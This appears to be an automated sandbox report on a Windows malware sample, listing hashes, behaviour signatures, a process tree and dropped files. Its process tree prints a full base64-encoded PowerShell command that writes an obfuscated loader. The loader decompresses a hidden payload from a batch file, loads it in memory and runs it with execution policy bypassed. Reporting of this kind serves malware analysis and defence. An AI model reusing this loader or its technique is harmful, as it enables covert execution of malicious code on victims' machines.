3b254f8a4c56c1eb0e48ffbbcb1024149a009b4ec4123d913059e8038fa09183

General

Target

3b254f8a4c56c1eb0e48ffbbcb1024149a009b4ec4123d913059e8038fa09183.exe
Size

332KB
MD5

48fb8d3e38e1bcbee6398d2994764730
SHA1

59af4f0dcf814ab16f35dfa27dec423fae56772c
SHA256

3b254f8a4c56c1eb0e48ffbbcb1024149a009b4ec4123d913059e8038fa09183
SHA512

2243ba06a132ced2d4188785fc9e02de1ccafc8fec479409bccace5ab4fa71ba84d28fd9defed9f9521e54d81dbcd34e8a12d1bad418b8c04a06e7f9783d9cb6
SSDEEP

6144:3fL+oq6sq12PAjvjHSPMW3JB68oZmaYtJ7lbwum:3fLDsqI+jSPLoZBP

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2592	powershell.exe
2656	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	2656	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2796 wrote to memory of 2388	2796	3b254f8a4c56c1eb0e48ffbbcb1024149a009b4ec4123d913059e8038fa09183.exe	28
PID 2796 wrote to memory of 2388	2796	3b254f8a4c56c1eb0e48ffbbcb1024149a009b4ec4123d913059e8038fa09183.exe	28
PID 2796 wrote to memory of 2388	2796	3b254f8a4c56c1eb0e48ffbbcb1024149a009b4ec4123d913059e8038fa09183.exe	28
PID 2796 wrote to memory of 2388	2796	3b254f8a4c56c1eb0e48ffbbcb1024149a009b4ec4123d913059e8038fa09183.exe	28
PID 2388 wrote to memory of 1144	2388	wscript.exe	29
PID 2388 wrote to memory of 1144	2388	wscript.exe	29
PID 2388 wrote to memory of 1144	2388	wscript.exe	29
PID 2388 wrote to memory of 1144	2388	wscript.exe	29
PID 1144 wrote to memory of 2592	1144	cmd.exe	31
PID 1144 wrote to memory of 2592	1144	cmd.exe	31
PID 1144 wrote to memory of 2592	1144	cmd.exe	31
PID 1144 wrote to memory of 2592	1144	cmd.exe	31
PID 1144 wrote to memory of 2656	1144	cmd.exe	32
PID 1144 wrote to memory of 2656	1144	cmd.exe	32
PID 1144 wrote to memory of 2656	1144	cmd.exe	32
PID 1144 wrote to memory of 2656	1144	cmd.exe	32

C:\Users\Admin\AppData\Local\Temp\3b254f8a4c56c1eb0e48ffbbcb1024149a009b4ec4123d913059e8038fa09183.exe
"C:\Users\Admin\AppData\Local\Temp\3b254f8a4c56c1eb0e48ffbbcb1024149a009b4ec4123d913059e8038fa09183.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2796
- C:\Windows\SysWOW64\wscript.exe
  "wscript.exe" "C:\Users\Admin\start.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2388
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\temp.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1144
  - - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('IyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQpmdW5jdGlvbiBEZWNvbXByZXNzQnl0ZXMoJGNvbXByZXNzZWREYXRhKSB7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGNvbXByZXNzZWREYXRhKSkpOyAkbXMuUG9zaXRpb24gPSAwOyAkZGVmbGF0ZVN0cmVhbSA9IFtJTy5Db21wcmVzc2lvbi5EZWZsYXRlU3RyZWFtXTo6bmV3KCRtcywgW0lPLkNvbXByZXNzaW9uLkNvbXByZXNzaW9uTW9kZV06OkRlY29tcHJlc3MpOyAkYnVmZmVyID0gW2J5dGVbXV06Om5ldyg0MDk2KTsgJG1zID0gW0lPLk1lbW9yeVN0cmVhbV06Om5ldygpOyB3aGlsZSAoJHRydWUpIHsgJGNvdW50ID0gJGRlZmxhdGVTdHJlYW0uUmVhZCgkYnVmZmVyLCAwLCAkYnVmZmVyLkxlbmd0aCk7IGlmICgkY291bnQgLWVxIDApIHsgYnJlYWsgfSAkbXMuV3JpdGUoJGJ1ZmZlciwgMCwgJGNvdW50KSB9ICRkZWZsYXRlU3RyZWFtLkNsb3NlKCk7ICRtcy5Ub0FycmF5KCkgfQ0KDQojICJUaGUgc3VyZXN0IHdheSB0byBjb3JydXB0IGEgeW91dGggaXMgdG8gaW5zdHJ1Y3QgaGltIHRvIGhvbGQgaW4gaGlnaGVyIGVzdGVlbSB0aG9zZSB3aG8gdGhpbmsgYWxpa2UgdGhhbiB0aG9zZSB3aG8gdGhpbmsgZGlmZmVyZW50bHkuIg0KIyAiSW4gaGVhdmVuLCBhbGwgdGhlIGludGVyZXN0aW5nIHBlb3BsZSBhcmUgbWlzc2luZy4iDQoNCg0KDQpmdW5jdGlvbiBSZXZlcnNlU3RyaW5nKCRpbnB1dFN0cmluZykgew0KICAgICRjaGFyQXJyYXkgPSAkaW5wdXRTdHJpbmcuVG9DaGFyQXJyYXkoKQ0KICAgICRyZXZlcnNlZEFycmF5ID0gJGNoYXJBcnJheVstMS4uLSgkY2hhckFycmF5Lkxlbmd0aCldDQogICAgJHJldmVyc2VkU3RyaW5nID0gLWpvaW4gJHJldmVyc2VkQXJyYXkNCiAgICByZXR1cm4gJHJldmVyc2VkU3RyaW5nDQp9DQojICJUaGVyZSBpcyBhbHdheXMgc29tZSBtYWRuZXNzIGluIGxvdmUuIEJ1dCB0aGVyZSBpcyBhbHNvIGFsd2F5cyBzb21lIHJlYXNvbiBpbiBtYWRuZXNzLiINCiMgIlRoYXQgd2hpY2ggZG9lcyBub3Qga2lsbCB1cyBtYWtlcyB1cyBzdHJvbmdlci4iDQoNCmZ1bmN0aW9uIENsb3NlLVByb2Nlc3Mgew0KICAgIHBhcmFtKA0KICAgICAgICBbc3RyaW5nXSRQcm9jZXNzTmFtZQ0KICAgICkNCg0KICAgICRwcm9jZXNzID0gR2V0LVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1FcnJvckFjdGlvbiBTaWxlbnRseUNvbnRpbnVlDQoNCiAgICBpZiAoJHByb2Nlc3MgLW5lICRudWxsKSB7DQogICAgICAgIFN0b3AtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUZvcmNlDQoJfQ0KfQ0KIyAiSW4gaW5kaXZpZHVhbHMsIGluc2FuaXR5IGlzIHJhcmU7IGJ1dCBpbiBncm91cHMsIHBhcnRpZXMsIG5hdGlvbnMsIGFuZCBlcG9jaHMsIGl0IGlzIHRoZSBydWxlLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KDQokZW5jb2RlZEFycmF5ID0gQCgxNTksMjIwLDIzOCwyMzgsMjI0LDIzMiwyMjEsMjMxLDI0NCwxNjksMTkyLDIzMywyMzksMjM3LDI0NCwyMDMsMjM0LDIyOCwyMzMsMjM5LDE2OSwxOTYsMjMzLDI0MSwyMzQsMjMwLDIyNCwxNjMsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjcsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjQsMTgyKQ0KJGRlY29kZWRTdHJpbmcgPSBDTlYgJGVuY29kZWRBcnJheQ0KDQoNCiRmaWxlUGF0aCA9IEpvaW4tUGF0aCAkZW52OlVzZXJQcm9maWxlICJ2S01QUWQuYmF0Ig0KJGxhc3RMaW5lID0gR2V0LUNvbnRlbnQgLVBhdGggJGZpbGVQYXRoIHwgU2VsZWN0LU9iamVjdCAtTGFzdCAxDQokY2xlYW5lZExpbmUgPSAkbGFzdExpbmUgLXJlcGxhY2UgJ146OicNCiRyZXZlcnNlID0gUmV2ZXJzZVN0cmluZyAkY2xlYW5lZExpbmUNCiRkZWNvbXByZXNzZWRCeXRlID0gRGVjb21wcmVzc0J5dGVzIC1jb21wcmVzc2VkRGF0YSAkcmV2ZXJzZQ0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCg0KQ2xvc2UtUHJvY2VzcyAtUHJvY2Vzc05hbWUgImNtZCINCkludm9rZS1FeHByZXNzaW9uICRkZWNvZGVkU3RyaW5n')) | Out-File -FilePath 'C:\Users\Admin\vKMPQd.ps1' -Encoding UTF8"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2592
  - - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\vKMPQd.ps1"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2656

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
782ca82694eff9ab5c68da898ce157fc

SHA1
b51e362a2745af351808656bed5c580762aa8972

SHA256
9764629be2bdc4a9d4ab6ebd2c13bf372459dd0981dc369bd922c5bd1d4b6dd8

SHA512
ab90faa6a3cb9bacb34811a051e6aad025605dbfb857e52833b34203214e4ddf88922f9e553366e192d04ebf6c6313193b33bc9e5748c67b1c108d0151629734

Download Submit
C:\Users\Admin\start.vbs

Filesize
173B

MD5
2fd98bad7e3e521d8a67acfa4a681a86

SHA1
545fd01deb3a8cc9f605aa33ea2b060e9b904c5b

SHA256
aa1ed4fef63aad3ca2461ab76ab18890bffb7554100bee65dd7665b213c25706

SHA512
3aafad51333b06e31d4c6965f1b2d81f4e7d5ebd7334bec2ebbe648930154dfc34848d96a4cd27a43e3d709a0b4a24eb3d3bf77d91c10733975f9e95a24f44c8

Download Submit
C:\Users\Admin\temp.bat

Filesize
277KB

MD5
8b4e4571f1b43434f6ed2b668dddf598

SHA1
4b7cbd44f9dbdf4e7297fd10a13c587dad3541a2

SHA256
ba51fc7d4bd3f667bf018b96e2afd34dc18e766839b2e3a5cf4232f6c34ff7bb

SHA512
10089e93684e5131576107933d11cf6107ea44a705d04a52d2513d16ab3cc209b15b00c15cfc1abb93965def900cfce8ddc42d8e157e4f0bc4d7dc98fd1c40be

Download Submit
C:\Users\Admin\vKMPQd.ps1

Filesize
2KB

MD5
452a171820a72b38003c5cf1b8969851

SHA1
342916fe746fa239bfc44aed2b756c031b6b3358

SHA256
9f60027ef0813cd4797d797a6a4d7e1397913e9078b911c07a63d5e6b79ce28d

SHA512
fbee68566ca39766eed2e760f2a99fe692a975eddd325d1ed1df01417d5e072c03c6167ac915de32f00c1d7ca43dc02fda3b5cd94bd6ac4ed9ac86f9876e44ff

Download Submit

Analysis

Sharing